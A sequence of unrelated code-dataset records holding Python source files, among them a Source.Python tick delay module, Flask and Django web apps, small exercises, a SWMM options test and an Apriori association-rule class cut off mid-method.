listeners_tick_delays_logger.log_debug(\n 'Delay.__init__ <{0}> <{1}> <{2}> <{3}>'.format(\n seconds, callback, args, kwargs))\n\n # Store the time to execute the callback\n self._exec_time = time.time() + seconds\n\n # Store the callback, arguments, and keywords\n self.callback = callback\n self.args = args\n self.kwargs = kwargs\n\n def __call__(self):\n \"\"\"Call the delay with the proper arguments and keywords.\"\"\"\n # Log the call message\n listeners_tick_delays_logger.log_debug(\n 'Delay.__call__ - Try to call - <{0}> <{1}> <{2}>'.format(\n self.callback, self.args, self.kwargs))\n\n # Use try/except in case an error is encountered\n try:\n\n # Execute the callback with the arguments and keywords\n self.callback(*self.args, **self.kwargs)\n\n # Was an error encountered?\n except:\n\n # Print the exception to the console\n except_hooks.print_exception()\n\n @property\n def exec_time(self):\n \"\"\"Return the time to execute the delayed function.\"\"\"\n return self._exec_time\n\n def cancel(self):\n \"\"\"Cancel the delay.\"\"\"\n tick_delays.cancel_delay(self)\n\n\nclass _Times(list):\n\n \"\"\"List class used to store delays to be called.\"\"\"\n\n def call_delays(self):\n \"\"\"Call the delays in the list.\"\"\"\n # Loop through the delays in the list\n for item in self:\n\n # Call the delay\n item()\n\n\nclass _TickDelays(dict):\n\n \"\"\"Class used to store delays to be called by a tick listener.\"\"\"\n\n def __init__(self):\n \"\"\"Store an ordered list to sort delays.\"\"\"\n super(_TickDelays, self).__init__()\n self._order = list()\n\n def __missing__(self, item):\n \"\"\"Called when first adding a time to the dictionary.\"\"\"\n # Log the missing message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.__missing__ <{0}>'.format(item))\n\n # Is the tick listener registered?\n if not self:\n\n # Log the tick listener registration message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays - Registering Tick Listener')\n\n # Register the tick listener\n tick_listener_manager.register_listener(self._tick)\n\n # Add the item to the dictionary as a _Times instance\n self[item] = _Times()\n\n # Add the time to the ordered list\n self._order.append(item)\n\n # Sort the ordered list\n self._order.sort()\n\n # Return the item's instance\n return self[item]\n\n def __iter__(self):\n \"\"\"Loop through the ordered list.\"\"\"\n # Loop through each item in the ordered list\n for item in self._order:\n\n # Yield 
the item\n yield item\n\n def __delitem__(self, item):\n \"\"\"Call the delays and remove the time from the ordered list.\"\"\"\n # Log the delitem message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.__delitem__ <{0}>'.format(item))\n\n # Is the item in the dictionary?\n if item not in self:\n\n # Log the not in self message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.__delitem__ - Item not in dictionary')\n\n # If not, simply return\n return\n\n # Call all delays for the given item\n self[item].call_delays()\n\n # Remove the item from the ordered list\n self._order.remove(item)\n\n # Remove the item from the dictionary\n super(_TickDelays, self).__delitem__(item)\n\n def delay(self, seconds, callback, *args, **kwargs):\n \"\"\"Create a delay.\"\"\"\n # Get the Delay instance for the given arguments\n delay_object = Delay(seconds, callback, *args, **kwargs)\n\n # Add the Delay instance to the dictionary using its execution time\n self[delay_object._exec_time].append(delay_object)\n\n # Return the object\n return delay_object\n\n def _tick(self):\n \"\"\"Called every tick when the listener is registered.\"\"\"\n # Get the current time\n current_time = time.time()\n\n # Loop through each item in the ordered list\n for item in self:\n\n # Should the delays be called?\n if item > current_time:\n\n # If not, no need to continue looping\n break\n\n # Remove the item from the dictionary\n del self[item]\n\n # Is the dictionary now empty?\n if not self:\n\n # Log the tick listener unregistering message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays._tick - Unregistering Tick Listener')\n\n # Unregister the tick listener\n tick_listener_manager.unregister_listener(self._tick)\n\n def cancel_delay(self, delay_object):\n \"\"\"Cancel a delay.\"\"\"\n # Log the canceling message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay <{0}>'.format(delay_object))\n\n # Is the given argument a Delay object?\n if not isinstance(delay_object, Delay):\n\n # If not, raise an error\n raise TypeError(\n 'tick_delays.cancel_delay requires a Delay instance.')\n\n # Is the given Delay object's time no longer in the dictionary?\n if delay_object._exec_time not in self:\n\n # If not, raise an error\n raise KeyError('Object is no longer registered.')\n\n # Log the removing from list message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay - Removing from '\n '<{0}>'.format(delay_object._exec_time))\n\n # Remove the delay from its time\n self[delay_object._exec_time].remove(delay_object)\n\n # Does the delay's time have any remaining objects?\n if not self[delay_object._exec_time]:\n\n # Log the deletion of the time from the dictionary message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay - Removing <{0}> '\n 'from dictionary'.format(delay_object._exec_time))\n\n # If not, remove the delay's time from the dictionary\n del self[delay_object._exec_time]\n\n # Are there any remaining delays?\n if not self:\n\n # Log the tick listener unregistering message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay - Unregistering Tick Listener')\n\n # Unregister the listener\n tick_listener_manager.unregister_listener(self._tick)\n\n# Get the _TickDelays instance\ntick_delays = 
_TickDelays()\n","sub_path":"addons/source-python/packages/source-python/listeners/tick/delays.py","file_name":"delays.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"186587948","text":"# test the pre-trained model on a single video\n# (working on it)\n# Bolei Zhou\n\nimport argparse\nimport time\n\nimport numpy as np\nimport torch.nn.parallel\nimport torch.optim\nimport torchvision\nfrom sklearn.metrics import confusion_matrix\nfrom dataset import TSNDataSet\nfrom models import TSN\nfrom transforms import *\nfrom ops import ConsensusModule\nimport datasets_video\nimport pdb\nfrom torch.nn import functional as F\n\n\n# options\nparser = argparse.ArgumentParser(\n    description=\"test TRN on a single video\")\nparser.add_argument('dataset', type=str, choices=['something','jester','moments','charades'])\nparser.add_argument('modality', type=str, choices=['RGB', 'Flow', 'RGBDiff'])\nparser.add_argument('weights', type=str)\nparser.add_argument('--arch', type=str, default=\"resnet101\")\nparser.add_argument('--save_scores', type=str, default=None)\nparser.add_argument('--test_segments', type=int, default=25)\nparser.add_argument('--max_num', type=int, default=-1)\nparser.add_argument('--test_crops', type=int, default=10)\nparser.add_argument('--input_size', type=int, default=224)\nparser.add_argument('--crop_fusion_type', type=str, default='TRN',\n                    choices=['avg', 'TRN','TRNmultiscale'])\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n                    help='number of data loading workers (default: 4)')\nparser.add_argument('--gpus', nargs='+', type=int, default=None)\nparser.add_argument('--img_feature_dim',type=int, default=256)\nparser.add_argument('--num_set_segments',type=int, default=1,help='TODO: select multiple sets of n-frames from a video')\nparser.add_argument('--softmax', type=int, default=0)\n\nargs = parser.parse_args()\n\n# derive the class count from the dataset metadata; assumes datasets_video.return_dataset\n# returns the category list first, as in the TRN codebase\ncategories, *_ = datasets_video.return_dataset(args.dataset, args.modality)\nnum_class = len(categories)\n\nnet = TSN(num_class, args.test_segments if args.crop_fusion_type in ['TRN','TRNmultiscale'] else 1, args.modality,\n          base_model=args.arch,\n          consensus_type=args.crop_fusion_type,\n          img_feature_dim=args.img_feature_dim,\n          )\n\ncheckpoint = torch.load(args.weights)\nprint(\"model epoch {} best prec@1: {}\".format(checkpoint['epoch'], checkpoint['best_prec1']))\n\nbase_dict = {'.'.join(k.split('.')[1:]): v for k,v in list(checkpoint['state_dict'].items())}\nnet.load_state_dict(base_dict)\n\nif args.test_crops == 1:\n    cropping = torchvision.transforms.Compose([\n        GroupScale(net.scale_size),\n        GroupCenterCrop(net.input_size),\n    ])\nelif args.test_crops == 10:\n    cropping = torchvision.transforms.Compose([\n        GroupOverSample(net.input_size, net.scale_size)\n    ])\nelse:\n    raise ValueError(\"Only 1 and 10 crops are supported while we got {}\".format(args.test_crops))\n\n# too lazy to continue...(#,#!)\n","sub_path":"test_video.py","file_name":"test_video.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"519565380","text":"#!/usr/bin/env python3.8\n\n'''\nThe user chooses whether to compute a leg (cateto) or the hypotenuse, and the program returns the chosen value. 
\nWith input data validation.\n'''\n\n#importing the module with system information\nimport sys\n#appending the path to my modules to the end of the module search list\nsys.path.append('/home/danielle8farias/hello-world-python3/meus_modulos')\n#importing helper modules\nfrom mensagem import ler_cabecalho, rodape, linha, ler_resposta\n#importing the square root module\nfrom math import sqrt, hypot\n#importing number modules\nfrom numeros import ler_num_float\n\n#function that computes the remaining leg (cateto)\ndef calcular_cateto(a, b):\n    #calling the sqrt function, which computes the square root\n    # **2 raises to the power of two\n    # or pow(base, exponent)\n    c = sqrt(a**2 - pow(b, 2))\n    #function return value\n    return c\n\n\n#function that validates the choice\ndef ler_escolha(num):\n    #loop\n    while True:\n        try:\n            #input() captures whatever is typed as a string\n            #int() converts the received string to an integer\n            #assigning the value to the 'escolha' variable\n            escolha = int(input(num))\n            #checking whether the choice is neither 1 nor 2\n            if escolha != 1 and escolha != 2:\n                #raising a custom exception\n                raise Exception('Escolha 1 ou 2.')\n        #in case spaces or ENTER are typed\n        #the 'erro' variable holds the exception message\n        except ValueError:\n            #print() writes a string to the screen\n            print('Digite um número.')\n            #going back to the start of the loop\n            continue\n        #catching the custom exception\n        except Exception as erro:\n            #print(f'') writes a formatted string to the screen\n            print(f'Valor inválido: {erro}')\n            continue\n        #if the 'try' block succeeds\n        else:\n            return escolha\n\n\n#main program\n#call that prints the header\nler_cabecalho('hipotenusa')\nwhile True:\n    print('Digite:')\n    print('1 para Hipotenusa')\n    print('2 para Cateto')\n    #an empty print() outputs nothing; it just skips a line\n    print()\n    #validate the answer\n    #assigns the function's return value to the 'escolha' variable\n    escolha = ler_escolha('O que deseja calcular? ')\n    print()\n    if escolha == 1:\n        b = ler_num_float('Digite o 1º Cateto: ')\n        c = ler_num_float('Digite o 2º Cateto: ')\n        #a = sqrt(b**2 + c**2)\n        a = hypot(b, c)\n        print(f'O valor da Hipotenusa é: {a:.2f}')\n    else:\n        a = ler_num_float('Digite a Hipotenusa: ')\n        b = ler_num_float('Digite o Cateto: ')\n        c = calcular_cateto(a, b)\n        print(f'O valor do outro Cateto é: {c:.2f}')\n    print()\n    #calling the function that reads the answer\n    resposta = ler_resposta('Deseja continuar? [S/N]')\n    print()\n    #checking whether the 'resposta' variable equals the string N\n    if resposta == 'N':\n        #breaking the loop\n        break\n    else:\n        #calling the linha (divider line) function\n        linha()\n        print()\n#calling the rodape (footer) function\nrodape()\n","sub_path":"exercicio_py/ex0081_hipotenusa.py","file_name":"ex0081_hipotenusa.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"202440087","text":"# Implement the buscar_persona function, which returns a person's record based on their id.\n# The return value is a tuple containing the fields: id, nombre, nacimiento, dni and altura.\n# If no record is found, it returns False.\n\nimport datetime\nimport sqlite3\n\nfrom practico_03.ejercicio_01 import reset_tabla\nfrom practico_03.ejercicio_02 import agregar_persona\n\n\ndef buscar_persona(id_persona):\n    db = sqlite3.connect('mibase')\n    cursor = db.cursor()\n    sel = cursor.execute(\"SELECT IdPersona, Nombre, FechaNacimiento, DNI, Altura FROM Persona WHERE IdPersona = ?\",(id_persona,))\n    persona = sel.fetchone()\n    db.commit()\n    db.close()\n    if persona:\n        return persona\n    else:\n        return False\n\n\n@reset_tabla\ndef pruebas():\n    juan = buscar_persona(agregar_persona('juan perez', datetime.datetime(1988, 5, 15), 32165498, 180))\n    assert juan == (1, 'juan perez', str(datetime.datetime(1988, 5, 15)), 32165498, 180)\n    assert buscar_persona(12345) is False\n\nif __name__ == '__main__':\n    pruebas()\n","sub_path":"practico_03/ejercicio_04.py","file_name":"ejercicio_04.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"85073259","text":"\n# importing the necessary dependencies\nfrom flask import Flask, render_template, request,jsonify\nfrom flask_cors import CORS,cross_origin\nimport pickle\n\napp = Flask(__name__) # initializing a flask app\n\n@app.route('/',methods=['GET']) # route to display the home page\n@cross_origin()\ndef homePage():\n    return render_template(\"index.html\")\n\n@app.route('/predict',methods=['POST','GET']) # route to show the predictions in a web UI\n@cross_origin()\ndef index():\n    if request.method == 'POST':\n        try:\n            #'avg_rss12', 'var_rss12', 'avg_rss13', 'var_rss13', 'avg_rss23','var_rss23'\n            # reading the inputs given by the user\n            avg12=float(request.form['avg_rss12'])\n            var12 = float(request.form['var_rss12'])\n            avg13 = float(request.form['avg_rss13'])\n            var13 = float(request.form['var_rss13'])\n            avg23 = float(request.form['avg_rss23'])\n            var23 = float(request.form['var_rss23'])\n            filename = 'Logistic_Regression_model.pickle'\n            loaded_model = pickle.load(open(filename, 'rb')) # loading the model file from the storage\n            # predictions using the loaded model file\n            prediction=loaded_model.predict([[avg12,var12,avg13,var13,avg23,var23]])\n            print('prediction is', prediction)\n            res = numbers_to_strings(prediction[0])\n            # showing the prediction results in a UI\n            return render_template('results.html',prediction=res)\n        except Exception as e:\n            print('The Exception message is: ',e)\n            return 'something is wrong'\n        # return render_template('results.html')\n    else:\n        return render_template('index.html')\n\n\n# Function to convert number into string\n# Switcher is dictionary data type here\ndef numbers_to_strings(argument):\n    switcher = {\n        0: \"Bending Type 1\",\n        1: \"Bending Type 2\",\n        2: \"Cycling\",\n        3: \"Lying\",\n        4: \"Sitting\",\n        5: \"Standing\",\n        6: \"Walking\",\n\n    }\n    # get() method of dictionary data 
type returns\n # value of passed argument if it is present\n # in dictionary otherwise second argument will\n # be assigned as default value of passed argument\n return switcher.get(argument, \"nothing\")\n\n\nif __name__ == \"__main__\":\n #app.run(host='127.0.0.1', port=8001, debug=True)\n\tapp.run(debug=True) # running the app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"23277785","text":"import unittest\nfrom core.swmm.options import dynamic_wave\n\n\nclass OptionsDynamicWaveTest(unittest.TestCase):\n \"\"\"Test OPTIONS section: Dynamic Wave\"\"\"\n def __init__(self):\n unittest.TestCase.__init__(self)\n\n def setUp(self):\n\n self.my_options = dynamic_wave.DynamicWave()\n\n def runTest(self):\n \"\"\"Test OPTIONS: Dynamic Wave \"\"\"\n name = self.my_options.SECTION_NAME\n assert name == \"[OPTIONS]\"\n\n expected_text = \"[OPTIONS]\\n\" + \\\n \" LENGTHENING_STEP \t0.0\\n\" + \\\n \" VARIABLE_STEP \t0.0\\n\" + \\\n \" INERTIAL_DAMPING \tNONE\\n\" + \\\n \" FORCE_MAIN_EQUATION\tH-W\\n\" + \\\n \" NORMAL_FLOW_LIMITED\tBOTH\\n\" + \\\n \" MAX_TRIALS \t8\\n\" + \\\n \" MIN_SURFAREA \t0.0\\n\" + \\\n \" HEAD_TOLERANCE \t0.005\\n\" + \\\n \" THREADS \t1\\n\" + \\\n \" MINIMUM_STEP \t0.5\"\n\n\n # Test example from expected_text\n test_text = expected_text\n self.my_options.set_text(test_text)\n actual_text = self.my_options.get_text() # display purpose\n assert self.my_options.matches(test_text)\n","sub_path":"test/core/swmm/test_options_dynamicwave.py","file_name":"test_options_dynamicwave.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614128109","text":"from flask import request, Response\nimport requests\nimport json\nfrom flask_restplus import Api, Resource, Namespace, fields, Model\nimport datetime\nfrom firebase_admin import auth\nimport app.utils.messages as messages\nfrom app.apis.validate.user_validate import validate_user_signup_data\nfrom app.apis.models.user import add_models_to_namespace\nfrom app.apis.models.user import *\nfrom app.database.dao.user import UserDAO\nfrom app.utils.view_decorator import token_required\nimport os\n\nuser_ns = Namespace('user', description='Functions related to user')\nadd_models_to_namespace(user_ns)\n\n@user_ns.route('/register')\nclass UserRegister(Resource):\n \n @user_ns.response(201, \"%s\" % (\n {\"message\" : \"User was created successfully. 
Please check your email to verify the account\"}\n    ))\n    @user_ns.response(400, \"%s\" % (\n        {\"message\" : \"user already exists\"}\n    ))\n    @user_ns.expect(register_user_model)\n    def post(self):\n        \n        data = request.json\n        \n        not_valid = validate_user_signup_data(data)\n        \n        if not_valid:\n            return not_valid\n        \n        result = UserDAO.create_user(data)\n        return result\n    \n\n@user_ns.route('/login')\nclass UserSignIn(Resource):\n    \n    @user_ns.response(200, \"User logged in successfully\", login_response_model)\n    @user_ns.response(400, \"%s\" % (\n        {\"message\": \"password is incorrect\"}\n    ))\n    @user_ns.expect(login_user_model)\n    def post(self):\n        data = request.json\n        email = data['email']\n        password = data['password']\n        \n        login_response = UserDAO.authenticate(email, password)\n        return login_response\n\n\n@user_ns.route(\"/profile\")\nclass UserProfile(Resource):\n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @user_ns.response(200, \"Profile Data\", profile_body)\n    @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n        messages.TOKEN_EXPIRED,\n        messages.TOKEN_INVALID,\n        messages.TOKEN_REVOKED,\n        {\"message\": \"cannot find account\"}\n        ),\n    )\n    @token_required\n    def get(self):\n        token = request.headers['authorization']\n        \n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        \n        try:\n            user = UserDAO.get_profile(uid)\n        except Exception as e:\n            return {\"message\": \"cannot find account\"}, 400\n        \n        return user, 200\n    \n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @user_ns.response(200, \"%s\" % (messages.PROFILE_UPDATE_SUCCESSFULLY))\n    @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n        messages.TOKEN_EXPIRED,\n        messages.TOKEN_INVALID,\n        messages.TOKEN_REVOKED,\n        {\"message\": \"cannot find account\"}\n        ),\n    )\n    @user_ns.expect(update_profile_body)\n    @token_required\n    def put(self):\n        data = request.json\n        token = request.headers['authorization']\n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n\n        try:\n            user_updated_response = UserDAO.update_profile(uid, data)\n        \n        except Exception as e:\n            return {\"message\": str(e)}, 400\n        \n        return user_updated_response\n\n@user_ns.route(\"/profile/image\")\nclass UserProfileImage(Resource):\n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @user_ns.response(200, \"Profile Image Url\", profile_image_update)\n    @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n        messages.TOKEN_EXPIRED,\n        messages.TOKEN_INVALID,\n        messages.TOKEN_REVOKED,\n        {\"message\": \"Image updated successfully\"}\n        ),\n    )\n    @token_required\n    def put(self):\n        data = request.json\n        token = request.headers['authorization']\n        \n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        \n        try:\n            update_image_response = UserDAO.update_profile_image(uid,data[\"image_url\"])\n        except Exception as e:\n            return {\"message\": str(e)}, 400\n        \n        return update_image_response\n    \n\n\n@user_ns.route('/preferredlocation')\nclass UserUpdateLocation(Resource):\n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @user_ns.response(200, \"%s\" % ({\"message\":\"Preferred location updated successfully\"}))\n    @user_ns.response(400, \"%s\" % (\n        {\"message\": \"Cannot update preferred location\"}\n    ))\n    @user_ns.response(401, \"%s\" % (\n        {\"message\": \"This user cannot set preferred location\"}\n    ))\n    
@user_ns.expect(update_preferred_location_body)\n    @token_required\n    def post(self):\n        data = request.json\n        token = request.headers['authorization']\n        \n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        \n        try:\n            update_preferred_location_response = UserDAO.update_preferred_location(uid, data)\n        except Exception as e:\n            return {\"message\": str(e)}, 400\n        \n        return update_preferred_location_response\n    \n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})    \n    @token_required\n    @user_ns.response(400, \"%s\\n%s\" % (\n        {\"message\": \"Cannot find preferred location\"},\n        {\"message\": \"User is not a donor. Cannot set preferred location\"}\n    ))\n    @user_ns.response(200, \"Preferred Location Data\", preferred_location_body)\n    \n    def get(self):\n        token = request.headers['authorization']\n        \n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        \n        try:\n            preferred_location_response = UserDAO.get_preferred_location(uid)\n        except Exception as e:\n            return {\"message\": str(e)}, 400\n        \n        return preferred_location_response\n    \n\n@user_ns.route('/invite/moderator')\nclass InviteModerator(Resource):\n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n        {\"message\": \"Moderator is already registered. Do you want to proceed?\"},\n        {\"message\": \"User with this email is already signed up as a recipient/donor\"},\n        {\"message\": \"Invitation sent\"},\n        {\"message\": \"User cannot invite moderator\"}\n    ))\n    @user_ns.doc(params={'email': 'Email of moderator'})\n    @token_required\n    def post(self):\n        \n        token = request.headers['authorization']\n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        args = request.args\n        \n        if \"email\" in args:\n            mod_email = args.get(\"email\")\n        else:\n            return {\"message\": \"Please add email address of moderator\"}, 400\n        \n        try:\n            send_mod_invite = UserDAO.send_invite_to_mod(uid, mod_email)\n        except Exception as e:\n            return {\"message\": str(e)}, 400\n        \n        return send_mod_invite\n\n@user_ns.route('/dashboard')\nclass UserDashboard(Resource):\n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @token_required\n    def get(self):\n        \n        token = request.headers['authorization']\n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        \n        dashboard_response = UserDAO.get_dashboard(uid)\n        \n        return dashboard_response\n    \n@user_ns.route('/history')\nclass UserHistory(Resource):\n    \n    @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n    @token_required\n    def get(self):\n        \n        token = request.headers['authorization']\n        decoded_token = auth.verify_id_token(token)\n        uid = decoded_token['uid']\n        \n        history_response = UserDAO.get_histroy(uid)\n        \n        return history_response\n    \n# @user_ns.route('/resetpassword')\n# class ResetPassword(Resource):\n    \n    \n#     def get(self):\n#         email = request.args.get('email')\n#         try:\n#             link = auth.generate_password_reset_link(email, action_code_settings=None)\n#             ''' Send password reset email ''' \n#             # send_reset_link(email, link)\n        \n#         except Exception as e:\n#             return {'message': e.args[0]}, 400\n        \n#         return messages.RESET_LINK_SENT, 200\n    ","sub_path":"app/apis/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"305885093","text":"\n\n#open file and read its contents into an array as integers\nfilename = \"/Users/guy_steinberg/Dropbox/AdventOfCode/Day2_input.txt\"\ndef parse_input(filename, input_arr):\n input_file = open(filename, \"r\")\n\n for line in input_file:\n line_as_arr = line.split(',')\n for number in line_as_arr:\n input_arr.append(int(number))\n\n#debugging\n#input_arr = [1,9,10,3,2,3,11,0,99,30,40,50]\n#input_arr = [1,1,1,4,99,5,6,0,99]\n\n\n#helper funciton for computing values\ndef perform_operation(arr, opcode_index, func):\n #'func is either add or mult'\n try:\n pos1 = arr[opcode_index+1]\n pos2 = arr[opcode_index+2]\n pos3 = arr[opcode_index+3]\n if func == 'add':\n arr[pos3] = arr[pos1] + arr[pos2]\n else:\n arr[pos3] = arr[pos1] * arr[pos2]\n\n #print(input_arr)\n except:\n print(\"error\")\n\n#keep track of index for the opcode\n#opcode_index = 0\ndef part1_solution(arr) :\n\n for opcode_index in range(0,len(arr),4):\n if arr[opcode_index] == 1:\n #add nums at positions 1 & 2, store result in pos3\n perform_operation(arr, opcode_index, 'add')\n elif arr[opcode_index] == 2:\n perform_operation(arr, opcode_index, 'mult')\n elif arr[opcode_index] == 99:\n #halt program\n break\n else:\n print('error: invalid opcode')\n\n#replace pos 1 & 2 values as indicated by challange\n# part1_arr = []\n# parse_input(filename, part1_arr)\n# part1_arr[1] = 12\n# part1_arr[2] = 2\n# print(input_arr)\n\ndef part2_solution(arr):\n #inefficient and simple way, but it works for now (also are numbers are only\n # in range of 0-99 -> O(100^2*len(array)) worst case\n for noun in range(0,99):\n for verb in range(0,99):\n #reset input\n arr = []\n parse_input(filename, arr)\n print(noun, verb)\n arr[1] = noun\n arr[2] = verb\n \n if(arr[0] == 19690720):\n return (noun, verb)\n\npart2_arr = []\n# parse_input(filename, part2_arr)\nprint(part2_solution(part2_arr))\nprint(100*25+5)\n","sub_path":"Day2Challange.py","file_name":"Day2Challange.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"474163532","text":"from django.shortcuts import render, render_to_response\nfrom django.template.context_processors import csrf\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom squest_app.models import User, Question\nfrom django.utils import timezone\n\n\ndef display_registration_page(request):\n user = request.session.get('user_login', None)\n if user:\n return HttpResponseRedirect('user_page')\n else:\n return render_to_response(\"registration_page.html\", csrf(request))\n\n\ndef display_login_page(request):\n user_id = request.session.get('user_login', None)\n if user_id:\n return HttpResponseRedirect('user_page')\n else:\n return render_to_response(\"login_page.html\", csrf(request))\n\n\ndef register_new_user(request):\n data = request.POST\n args = (data['user_first_name'],\n data['user_last_name'],\n data['user_login'],\n data['user_password']\n )\n user = User()\n user.init_values(*args)\n user.save()\n request.session['user_login'] = user.pk\n return HttpResponseRedirect('/')\n\n\ndef perform_login(request):\n data = request.POST\n login = data.get('user_login', '')\n password = data.get('user_password', '')\n if not login and not password:\n return HttpResponseRedirect('/')\n user = User.authenticate(login, password)\n if user:\n request.session['user_login'] = user.pk\n return HttpResponseRedirect('user_page')\n else:\n return HttpResponseRedirect('/')\n\n\ndef 
perform_logout(request):\n data = request.session\n if data.get('user_login', None):\n del data['user_login']\n return HttpResponseRedirect('/')\n else:\n return HttpResponse(status=500)\n\n\ndef display_user_personal_page(request):\n data = request.session\n\n if data.get('user_login', None):\n user = User.objects.get(pk=data['user_login'])\n ret_dict = dict()\n ret_dict['questions'] = user.get_unpublished_questions()\n ret_dict['user'] = user\n ret_dict.update(csrf(request))\n return render_to_response(\"private_page.html\", ret_dict)\n else:\n return HttpResponseRedirect('/')\n\n\ndef display_public_page_of(request, user_login):\n data = request.session\n ret_dict = dict()\n if data.get('user_login', None):\n ret_dict['user'] = User.objects.get(pk=data['user_login'])\n ret_dict['anonymous_mode'] = False\n else:\n ret_dict['user'] = User.objects.get(pk='anonymous')\n ret_dict['anonymous_mode'] = True\n\n ret_dict['questions'] = Question.get_published_questions(user_login)\n ret_dict['author'] = User.objects.get(pk=user_login)\n ret_dict.update(csrf(request))\n return render_to_response(\"public_page.html\", ret_dict)\n\n\ndef ask_question(request):\n data = request.POST\n quest = data.get('question', '')\n to = data.get('to', '')\n if not quest and not to:\n return HttpResponseRedirect('user_page')\n user_login = request.session.get('user_login', 'anonymous')\n\n user_from = User.objects.get(pk=user_login)\n user_to = User.objects.get(pk=to)\n print(user_from.user_login)\n question = Question()\n question.question = quest\n question.asked_user = user_to\n question.asking_user = user_from\n question.save()\n print(question.asking_user.user_login)\n return HttpResponseRedirect('/' + to)\n\n\ndef answer_question(request):\n data = request.POST\n question_id = int(data.get('question_id', 0))\n answer = data.get('answer', '')\n if not question_id and not answer:\n return HttpResponseRedirect('/user_page')\n user = User.objects.get(pk=request.session['user_login'])\n question = Question.objects.all().filter(asked_user=user, published=False)[question_id]\n print(question)\n question.answer = answer\n question.answer_date = timezone.now()\n question.published = True\n question.save()\n return HttpResponseRedirect('/user_page')\n","sub_path":"squest_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125201245","text":"# Standard imports\n# import itertools\n# import unittest\nfrom copy import deepcopy\n# from timeit import timeit\n# from collections import Counter\n\n# Third-party imports\n# from pandas import DataFrame as df\n# from pandas import read_csv\n\n\n\n# https://www-users.cs.umn.edu/~kumar001/dmbook/ch6.pdf\nclass AprioriAlgorithm(object):\n def __init__(self, *, dataset = None, minsup = None, minconf = None):\n # Attributes\n self.all_frequent_itemsets = None\n self.all_rules = None\n self.dataset = None\n self.minconf = None\n self.minsup = None\n self.n = None # number of transaction\n\n # Call methods\n self.set_dataset(dataset) if dataset else None\n self.set_minsup(minsup)\n self.set_minconf(minconf)\n\n\n def set_dataset(self, dataset):\n self.dataset = dataset\n self.n = len(self.dataset)\n return self\n \n \n def set_minconf(self, minconf):\n self.minconf = minconf\n return self\n\n\n def set_minsup(self, minsup):\n self.minsup = minsup\n return self\n \n\n def set_transaction_dataset(self, *, transaction_dataset, transaction_id_column, 
itemset_column):\n transaction_dataset_cloned = transaction_dataset.copy(deep = True)\n transaction_dataset_cloned = transaction_dataset_cloned[{\n transaction_id_column,\n itemset_column\n }] \\\n .dropna() \\\n .drop_duplicates() \\\n .sort_values([transaction_id_column, itemset_column]) \\\n .set_index([transaction_id_column])\n\n self.dataset = []\n for transaction_id in transaction_dataset_cloned.index.unique():\n itemsets = transaction_dataset_cloned.loc[[transaction_id], itemset_column].tolist()\n self.dataset.append(tuple(itemsets))\n self.n = len(self.dataset)\n return self\n\n\n def generate_all_frequent_itemsets(self):\n self.all_frequent_itemsets = dict()\n\n frequent_single_itemsets = previous_frequent_itemsets = self._generate_frequent_single_itemsets()\n self.all_frequent_itemsets.update(frequent_single_itemsets)\n\n while True:\n previous_itemsets = list(previous_frequent_itemsets.keys())\n candidate_itemsets = self._generate_candidate_itemsets(previous_itemsets)\n frequent_itemsets = self._prune_frequent_itemsets(candidate_itemsets)\n\n if frequent_itemsets:\n 